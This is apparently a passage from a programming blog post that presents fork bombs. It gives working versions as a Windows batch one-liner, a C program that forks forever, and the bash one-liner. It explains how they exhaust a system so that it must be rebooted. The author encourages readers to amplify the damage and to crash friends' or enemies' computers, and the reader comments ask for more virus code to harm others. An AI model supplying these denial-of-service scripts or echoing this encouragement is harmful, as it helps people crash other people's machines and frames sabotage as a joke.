%0|%0
Code language: Arduino (arduino)
and save it as fork.bat Yep..its a virus of just 5 characters :P . On double clicking this file,it will lead to total CPU jam by opening about 500+ process of command prompt. #include <unistd.h>
int main(void)
{
while(1)
fork();
return 0;
}
Code language: Arduino (arduino)
Once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation. Stopping a fork bomb requires destroying all running instances of it. Trying to use a program to kill the rogue processes normally requires creating another process a difficult or impossible task as it will totally use memory for its instances. You can get creative and try to use program executables or call system applications or utilities recursively in the same manner and increase the damage manifolds. Let your creativity run loose. Use it for crashing your friends/foe’s PC :P CheersCode language: Bash (bash): (){ : |:& };:
Java URL Encoder/Decoder Example - In this tutorial we will see how to URL encode/decode…
Show Multiple Examples in OpenAPI - OpenAPI (aka Swagger) Specifications has become a defecto standard…
Local WordPress using Docker - Running a local WordPress development environment is crucial for testing…
1. JWT Token Overview JSON Web Token (JWT) is an open standard defines a compact…
GraphQL Subscription provides a great way of building real-time API. In this tutorial we will…
1. Overview Spring Boot Webflux DynamoDB Integration tests - In this tutorial we will see…
View Comments
thanks a lot ........i like to receive this command from you....have a good day...obviously i am going to destroy my foes using this technology,,,,,thank you again...
Thanks for this. please send me more codes about making virus. How can i protect my code from illegal use. thanks.